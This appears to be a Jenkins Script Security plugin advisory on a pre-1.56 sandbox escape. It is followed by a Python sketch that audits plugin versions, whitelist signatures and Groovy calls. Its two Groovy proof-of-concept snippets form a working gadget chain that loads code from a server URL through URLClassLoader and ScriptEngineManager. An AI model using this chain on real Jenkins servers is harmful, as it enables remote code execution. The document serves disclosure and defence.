Website: https://wiki.jenkins.io/display/JENKINS/Script+Security+Plugin

The Jenkins Script Security plugin prior to version 1.56 was vulnerable to code execution due to a sandbox escape. The plugin whitelisted two static methods in the default configuration. Both methods allowed type coercion between arbitrary objects and classes. For example, a java.lang.String could be coerced into a java.net.URL. The vulnerable methods searched for a relevant constructor and automatically called it before attempting to cast. This pattern can be used to produce a gadget chain and gain remote code execution.

Vulnerable methods:

staticMethod org.codehaus.groovy.runtime.ScriptBytecodeAdapter castToType java.lang.Object java.lang.Class
staticMethod org.kohsuke.groovy.sandbox.impl.Checker checkedCast java.lang.Class java.lang.Object boolean boolean boolean

Proof-of-concepts:

// PoC 1: constructor-invoking coercion through ScriptBytecodeAdapter.castToType
import org.codehaus.groovy.runtime.ScriptBytecodeAdapter
def url    = ["http://127.0.0.1:5000/"] as java.net.URL
def loader = ScriptBytecodeAdapter.castToType([url], java.net.URLClassLoader)
def engine = ScriptBytecodeAdapter.castToType([loader], javax.script.ScriptEngineManager)

// PoC 2: the same chain through Checker.checkedCast
import org.kohsuke.groovy.sandbox.impl.Checker
def url    = ["http://127.0.0.1:5000/"] as java.net.URL
def loader = Checker.checkedCast(java.net.URLClassLoader, [url], true, false, false)
def engine = Checker.checkedCast(javax.script.ScriptEngineManager, [loader], true, false, false)
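
Audit sketch for the advisory above, added here as an example (it is not code from the plugin or from the advisory's author): it checks a plugin version against 1.56, looks for the two listed signatures in a signature listing, and flags direct calls to either cast helper in Groovy source. The function names and the sample inputs are assumptions constructed for illustration.

```python
import re

FIXED_VERSION = (1, 56)  # advisory: versions prior to 1.56 are affected

# The two signatures the advisory lists, in the whitelist line format it shows.
VULNERABLE_SIGNATURES = {
    "staticMethod org.codehaus.groovy.runtime.ScriptBytecodeAdapter castToType "
    "java.lang.Object java.lang.Class",
    "staticMethod org.kohsuke.groovy.sandbox.impl.Checker checkedCast "
    "java.lang.Class java.lang.Object boolean boolean boolean",
}

# Direct calls to either cast helper in Groovy source.
CALL_RE = re.compile(
    r"\b(ScriptBytecodeAdapter\s*\.\s*castToType|Checker\s*\.\s*checkedCast)\s*\(")

def is_affected_version(version):
    """True when a plugin version string such as '1.55' sorts before 1.56."""
    numbers = []
    for piece in re.split(r"[.\-]", version.strip()):
        if not piece.isdigit():
            break  # stop at qualifiers such as 'beta'
        numbers.append(int(piece))
    if not numbers:
        raise ValueError(f"unparseable version: {version!r}")
    return tuple(numbers) < FIXED_VERSION

def flagged_signatures(lines):
    """Return listed signatures that match one of the two vulnerable methods."""
    normalized = (" ".join(line.split()) for line in lines)
    return [sig for sig in normalized if sig in VULNERABLE_SIGNATURES]

def flagged_calls(groovy_source):
    """Return (line_number, helper) for each direct call to a cast helper."""
    hits = []
    for number, line in enumerate(groovy_source.splitlines(), 1):
        if line.lstrip().startswith("//"):
            continue  # skip whole-line comments
        for match in CALL_RE.finditer(line):
            hits.append((number, re.sub(r"\s+", "", match.group(1))))
    return hits

# Constructed sample input: a signature listing and a script under review.
SAMPLE_SIGNATURES = [
    "staticMethod  org.codehaus.groovy.runtime.ScriptBytecodeAdapter castToType java.lang.Object java.lang.Class",
    "method java.lang.String length",
]
SAMPLE_SCRIPT = """// Checker.checkedCast(...) mentioned in a comment only
def loader = ScriptBytecodeAdapter.castToType([url], java.net.URLClassLoader)
def name = 'build'.toUpperCase()
"""
```

The call scan only sees explicit calls to the two helpers; a Groovy `as` coercion, like the first line of each proof of concept, is not flagged by it.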